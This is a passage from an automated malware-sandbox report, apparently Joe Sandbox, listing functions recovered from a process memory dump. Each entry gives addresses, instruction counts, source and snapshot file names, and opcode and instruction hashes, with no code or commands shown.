                                                                                                                                                                                                      • Instruction Fuzzy Hash: 40E0DF7260C8074FE718FE2CE590AF43392EB913A0F10873BC806C62D8DD6CE8828381
                                                                                                                                                                                                      Function 00007FFB498C4260 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                                                                                                                                                                                      • Instruction ID: 8a40c076ed75727f5742dc487bbe2a74ed0617bdadccfccff643a727642f5225
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 18ba18a943ee4dd1e0716ccb17947207b2c0a5ac732912e0e0b1e0b67193fad7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 55D05E51E1EC2F16D0B47A7C79167A90295DBC86A0B8A0372E81CC32CDDC4CDCC102C0
                                                                                                                                                                                                      Function 00007FFB498DF189 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d28ee72dc8dec20ce8fed975cb1d19c436bc2bf774c720a6f9e1fbf673ea9ef9
                                                                                                                                                                                                      • Instruction ID: 06693abcb44e7c60f1b473461524a19560518c48c176cd6f820195d11c022d12
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d28ee72dc8dec20ce8fed975cb1d19c436bc2bf774c720a6f9e1fbf673ea9ef9
                                                                                                                                                                                                      • Instruction Fuzzy Hash: B7E06891A5EBD50FEBA76A3C86652A47FA08F06200F0901EBC488CB1D3E84D0C4843A2
                                                                                                                                                                                                      Function 00007FFB498C8150 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 1db5612abc45ee25d10e137e221df2df469d1bf9db1baea2e512946e6d6f31ff
                                                                                                                                                                                                      • Instruction ID: 9a25f38ac3b62ac31e34f6cc25852884c7da592756b623fc7799a249f6fcd01c
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1db5612abc45ee25d10e137e221df2df469d1bf9db1baea2e512946e6d6f31ff
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 57E0C265A4DD4B0BEE8CAD39CC9201036D1EBA8204BA400A9C448C22C1F81AC882C381
                                                                                                                                                                                                      Function 00007FFB498C59D0 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: de468debe682384a4ada51a86ca342db9928b04da778ab81132a384b1a51b698
                                                                                                                                                                                                      • Instruction ID: bf8be69164703d563bf4105e6647f843a486706ed48c871b5d9a01614e6fafd7
                                                                                                                                                                                                      • Opcode Fuzzy Hash: de468debe682384a4ada51a86ca342db9928b04da778ab81132a384b1a51b698
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 32E0C27081CA4747F708BE3A8D4507AB2D1BB88282F844AB6DC9CC10D0FB2DC3C58242
                                                                                                                                                                                                      Function 00007FFB498CEE20 Relevance: .0, Instructions: 23COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 4dc5e420fd01d4b80e7d15d05b11765ae1670a4a244da6beea1dc9131e366fd4
                                                                                                                                                                                                      • Instruction ID: db6e9f983c68f4db0c40cdf22735ddf01487d267d218b15579a90db7a4f2d8e2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4dc5e420fd01d4b80e7d15d05b11765ae1670a4a244da6beea1dc9131e366fd4
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A2E0E62551998A4FD645EF2CC981A5037E0EF0B384B8800E5D818DF196D55DF9948711
                                                                                                                                                                                                      Function 00007FFB498C59E0 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: d606a3eff54a8afc23c6f3d9692f99aba78f197071398acf0b125e50e4cf453a
                                                                                                                                                                                                      • Instruction ID: 935f33e0e15132af47a248e17e26ccb1775357b7726b9f8afcbeb3f9349468d3
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d606a3eff54a8afc23c6f3d9692f99aba78f197071398acf0b125e50e4cf453a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 65D05B7092CD1A06FB50BE3C92096F567D0CB64355F040A77EC5DD71E4DD59598242C5
                                                                                                                                                                                                      Function 00007FFB498C3B59 Relevance: .0, Instructions: 14COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                      • Instruction ID: 2d753b83a63e190afcd2cf550962048f1f8263bac89cc51bf002f02cbfacda74
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3b199c7db29a0555a7ea2d430dad342ee8e14e956db0a55e7f56215082f33101
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BAC01232A0880D8E8F80EE9CA0016ECB7A0EB89221F041033E11CE2140CE24145047A0
                                                                                                                                                                                                      Function 00007FFB498CEC88 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 0000000E.00000002.1748911428.00007FFB498C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB498C0000, based on PE: false
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_7ffb498c0000_dddd.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                      • Opcode ID: 0a5f752df2c09eb0c943833d55dc258bfdd94beac84bacd88f350b69829a59e3
                                                                                                                                                                                                      • Instruction ID: c53be6ebf7de586e7d1d321751b1f824bafab1a2e2ea60e549a55208ed1b2370
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a5f752df2c09eb0c943833d55dc258bfdd94beac84bacd88f350b69829a59e3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 59B0128080AA5344DDCA2131CA012F82AD1CF411D0FC808F4FDCC49053D80C37DB0310